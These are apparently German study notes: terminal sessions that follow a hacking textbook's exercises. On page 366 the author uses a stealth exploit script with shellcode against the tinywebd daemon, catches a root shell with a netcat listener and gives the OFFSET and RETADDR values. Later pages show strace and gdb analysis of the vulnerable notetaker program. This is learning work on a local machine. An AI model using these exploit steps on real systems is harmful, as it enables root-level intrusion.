root@tomovic-Satellite-L300:/# cat /var/log/tinywebd.log
09/08/2013 14:38:09> Starting up..
09/08/2013 14:38:29> From 127.0.0.1:45041 "HEAD / HTTP/1.0" 404 Not Found
09/08/2013 14:39:10> Shutting down..
Wichtig ist nur, dass „Starting up“ und „Shutting down“ im Log drin sind. Bei mir fehlt die Index.html :-)
Seite 366:
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./tinywebd
Starting tiny web daemon..
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# nc -l -p 31337 &
[1] 2548
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# jobs
[1]+ Läuft nc -l -p 31337 &
!!! Achtung: Bitte ändert bei euch die Werte OFFSET und RETADDR in der .sh-Datei ab – die passenden Adressen sind auf jedem System anders.
OFFSET=524
RETADDR="\x24\xf5\xff\xbf"
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./xtool_tinywebd_stealth.sh loopback_shell 127.0.0.1
target IP: 127.0.0.1
shellcode: loopback_shell (83 bytes)
fake request: "GET / HTTP/1.1\x00" (15 bytes)
[Fake Request (15 b)] [NOP (302 b)] [shellcode (83 b)] [ret addr (128 b)]
Connection to 127.0.0.1 80 port [tcp/http] succeeded!
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# fg
nc -l -p 31337
whoami
root
09/11/2013 18:20:03> Starting up..
09/11/2013 18:22:54> Starting up..
09/11/2013 18:25:54> From 127.0.0.1:50224 "GET / HTTP/1.1" 404 Not Found
Hat doch ganz gut geklappt :-)
Seite 368:
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# strace ./notetaker test
execve("./notetaker", ["./notetaker", "test"], [/* 19 vars */]) = 0
brk(0) = 0x804b000
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fdb000
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=71733, ...}) = 0
mmap2(NULL, 71733, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7fc9000
close(3) = 0
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/i386-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\220\232\1\0004\0\0\0"..., 512) = 512
fstat64(3, {st_mode=S_IFREG|0755, st_size=1770984, ...}) = 0
mmap2(NULL, 1780508, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb7e16000
mmap2(0xb7fc3000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1ad) = 0xb7fc3000
mmap2(0xb7fc6000, 11036, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7fc6000
close(3) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7e15000
set_thread_area({entry_number:-1 -> 6, base_addr:0xb7e15900, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
mprotect(0xb7fc3000, 8192, PROT_READ) = 0
mprotect(0x8049000, 4096, PROT_READ) = 0
mprotect(0xb7ffe000, 4096, PROT_READ) = 0
munmap(0xb7fc9000, 71733) = 0
brk(0) = 0x804b000
brk(0x806c000) = 0x806c000
fstat64(1, {st_mode=S_IFCHR|0600, st_rdev=makedev(136, 1), ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fda000
write(1, "[DEBUG] buffer @ 0x804b008: 't"..., 37[DEBUG] buffer @ 0x804b008: 'test'
) = 37
write(1, "[DEBUG] datafile @ 0x804b070: '/"..., 43[DEBUG] datafile @ 0x804b070: '/var/notes'
) = 43
open("/var/notes", O_WRONLY|O_CREAT|O_APPEND, 0600) = 3
write(1, "[DEBUG] file descriptor is 3\n", 29[DEBUG] file descriptor is 3
) = 29
getuid32() = 0
write(3, "\0\0\0\0", 4) = 4
write(3, "\n", 1) = 1
write(3, "test", 4) = 4
write(3, "\n", 1) = 1
close(3) = 0
write(1, "Note has been saved.\n", 21Note has been saved.
) = 21
exit_group(0) = ?
Man sieht, über die Jahre wurde viel am Kernel gearbeitet.
Seite 369:
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# gdb -q ./notetaker
Reading symbols from /home/tomovic/Dokumente/hack/notetaker...done.
(gdb) set dis intel
Ambiguous set command "dis intel": disable-randomization, disassemble-next-line, disassembly-flavor, disconnected-dprintf...
`set dis intel` ist hier mehrdeutig (siehe Fehlermeldung oben) und nicht unbedingt notwendig; wer Intel-Syntax will, schreibt `set disassembly-flavor intel` aus, sonst bleibt die Ausgabe wie unten in AT&T-Syntax.
(gdb) disass main
Dump of assembler code for function main:
0x08048834 <+0>: push %ebp
0x08048835 <+1>: mov %esp,%ebp
0x08048837 <+3>: and $0xfffffff0,%esp
0x0804883a <+6>: sub $0x20,%esp
0x0804883d <+9>: movl $0x64,(%esp)
0x08048844 <+16>: call 0x80486ea <ec_malloc>
0x08048849 <+21>: mov %eax,0x1c(%esp)
0x0804884d <+25>: movl $0x14,(%esp)
0x08048854 <+32>: call 0x80486ea <ec_malloc>
0x08048859 <+37>: mov %eax,0x18(%esp)
0x0804885d <+41>: mov 0x18(%esp),%eax
0x08048861 <+45>: movl $0x7261762f,(%eax)
0x08048867 <+51>: movl $0x746f6e2f,0x4(%eax)
0x0804886e <+58>: movw $0x7365,0x8(%eax)
0x08048874 <+64>: movb $0x0,0xa(%eax)
0x08048878 <+68>: cmpl $0x1,0x8(%ebp)
0x0804887c <+72>: jg 0x8048893 <main+95>
0x0804887e <+74>: mov 0xc(%ebp),%eax
0x08048881 <+77>: mov (%eax),%eax
0x08048883 <+79>: mov 0x18(%esp),%edx
0x08048887 <+83>: mov %edx,0x4(%esp)
0x0804888b <+87>: mov %eax,(%esp)
0x0804888e <+90>: call 0x8048808 <usage>
0x08048893 <+95>: mov 0xc(%ebp),%eax
0x08048896 <+98>: add $0x4,%eax
0x08048899 <+101>: mov (%eax),%eax
0x0804889b <+103>: mov %eax,0x4(%esp)
0x0804889f <+107>: mov 0x1c(%esp),%eax
0x080488a3 <+111>: mov %eax,(%esp)
0x080488a6 <+114>: call 0x80484d0 <strcpy@plt>
0x080488ab <+119>: mov 0x1c(%esp),%eax
0x080488af <+123>: mov %eax,0x8(%esp)
0x080488b3 <+127>: mov 0x1c(%esp),%eax
0x080488b7 <+131>: mov %eax,0x4(%esp)
0x080488bb <+135>: movl $0x8048af3,(%esp)
0x080488c2 <+142>: call 0x8048490 <printf@plt>
0x080488c7 <+147>: mov 0x18(%esp),%eax
0x080488cb <+151>: mov %eax,0x8(%esp)
0x080488cf <+155>: mov 0x18(%esp),%eax
0x080488d3 <+159>: mov %eax,0x4(%esp)
0x080488d7 <+163>: movl $0x8048b10,(%esp)
0x080488de <+170>: call 0x8048490 <printf@plt>
0x080488e3 <+175>: movl $0x180,0x8(%esp)
---Type <return> to continue, or q <return> to quit---^CQuit
(gdb) quit
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#